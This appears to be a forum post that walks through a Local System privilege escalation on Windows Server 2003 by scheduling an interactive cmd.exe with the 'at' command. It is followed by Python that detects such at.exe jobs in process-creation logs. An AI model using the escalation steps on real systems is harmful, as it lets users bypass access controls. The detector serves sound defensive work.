I have just uncovered a way to perform root (Local System) privilege escalation under Windows (tested on Server 2003 SP2). It is so easy, with no add-ons or anything: all you need is a console.
- Open a command prompt (cmd.exe).
- Type whoami. This should return your username: a lowly peon user.
- In the command prompt, enter the following: at <current time + 1 min> /interactive "cmd.exe"
The point of this step is to set up a scheduled task that executes one minute from the current time. That scheduled task launches a command prompt under the credentials of Local System.
For example: at 11:05 /interactive "cmd.exe" will launch the cmd window at 11:05am.
- Type whoami into the new cmd window: it is now running as Local System. Voila!
Once escalated, you can use taskmgr to kill explorer and then re-run it from the new command prompt with the escalated privilege.
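From the defender's side, the pattern above is easy to spot in process-creation command lines. The following Python is an added example, not part of the original post: it parses at.exe invocations and rates any job that combines /interactive with a shell, which is exactly the escalation described. The sample command lines are constructed, and the verdict labels are my own.

```python
import re
import shlex

AT_NAMES = {"at", "at.exe"}  # names at.exe appears under in a logged command line
# Programs that hand whoever is at the console an interactive Local System session.
INTERACTIVE_SHELLS = {"cmd.exe", "cmd", "command.com", "taskmgr.exe", "taskmgr", "explorer.exe"}
TIME_RE = re.compile(r"^\d{1,2}:\d{2}(?:[ap]m)?$", re.IGNORECASE)

SAMPLE_CMDLINES = [  # constructed sample command lines, not real audit data
    "whoami",
    'at 11:05 /interactive "cmd.exe"',
    "at 23:00 /every:M,W,F backup.cmd",
    'C:\\WINDOWS\\system32\\AT.EXE 11:06 /INTERACTIVE "cmd.exe /c taskmgr"',
]

def _basename(token):
    """Lower-case file name of a (possibly quoted, possibly full-path) token."""
    return token.strip('"').rsplit("\\", 1)[-1].lower()

def parse_at_invocation(cmdline):
    """Return {time, interactive, command} for an at.exe call, else None."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # non-POSIX keeps backslashes intact
    except ValueError:  # unbalanced quotes in the logged command line
        return None
    if not tokens or _basename(tokens[0]) not in AT_NAMES:
        return None
    job = {"time": None, "interactive": False, "command": []}
    for tok in tokens[1:]:
        if tok.startswith("/"):  # switches such as /interactive or /every:
            job["interactive"] |= tok.lower() == "/interactive"
        elif job["time"] is None and TIME_RE.match(tok):
            job["time"] = tok
        else:  # anything else is the command the job will run
            job["command"].append(tok.strip('"'))
    job["command"] = " ".join(job["command"])
    return job

def classify(cmdline):
    """at jobs run as Local System, so /interactive plus a shell is the escalation."""
    job = parse_at_invocation(cmdline)
    if job is None:
        return None
    program = _basename(job["command"].split()[0]) if job["command"] else ""
    if job["interactive"]:
        job["verdict"] = "HIGH" if program in INTERACTIVE_SHELLS else "MEDIUM"
    else:
        job["verdict"] = "INFO"  # ordinary background job
    return job
```

Run it over every command line in the process-creation log (for example `[classify(c) for c in SAMPLE_CMDLINES]`) and alert on HIGH.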